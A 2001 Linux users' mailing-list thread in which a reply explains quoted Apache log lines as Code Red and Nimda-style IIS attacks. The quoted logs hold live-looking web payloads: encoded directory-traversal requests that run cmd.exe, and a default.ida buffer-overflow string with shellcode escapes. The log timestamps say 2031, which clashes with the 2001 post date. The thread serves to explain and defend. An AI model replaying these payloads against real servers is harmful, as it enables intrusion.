[wplug] weird apache logs

jsbillings at mac.com jsbillings at mac.com
Thu Dec 27 18:31:19 EST 2001 

The URLs that consist of lots of NNNN or XXX are exploit attemts on IIS, 
classic buffer overflow attacks.  The urls cmd.exe or other 
windows-looking programs are attempts to make use of the results of the 
exploit.  It's rarely an attack from the person who's machine it's 
coming from, these attacks (Code Red and variants) are built to attack 
other machines.  You could fire off a note to the owner of the domain, 
to let them know they've been infected.  This is actually a pretty old 
exploit, I've been seeing it for months.

On Thursday, December 27, 2001, at 02:19  PM, coldfire wrote:

> i've been getting some crazy get requests in my logs ... my guess is 
> that
> they are some kind of nt or iis exploits ... just not sure ... here are
> some ..
>
>
> 165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 275
> 165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 273
> 165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
> 165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
> 165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 314
> 165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 314
> 165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> system32/cmd.exe?/c+dir
> HTTP/1.0" 404 330
> 165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
> 165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
> 165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
> 165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 165.229.57.211 - - [27/Dec/2031:00:39:35 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
>
> another:
>
> 209.83.111.164 - - [19/Dec/2031:04:03:51 -0500] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=
> a
> HTTP/1.0" 400 317
>
> ...
>
> i've received several of these from ips which have no dns entries or
> rdns entries ... i'm not worried.  just curious.
>
>
> coldie
>
> _______________________________________________
> wplug mailing list
> wplug at wplug.org
> http://www.wplug.org/mailman/listinfo/wplug

More information about the wplug mailing list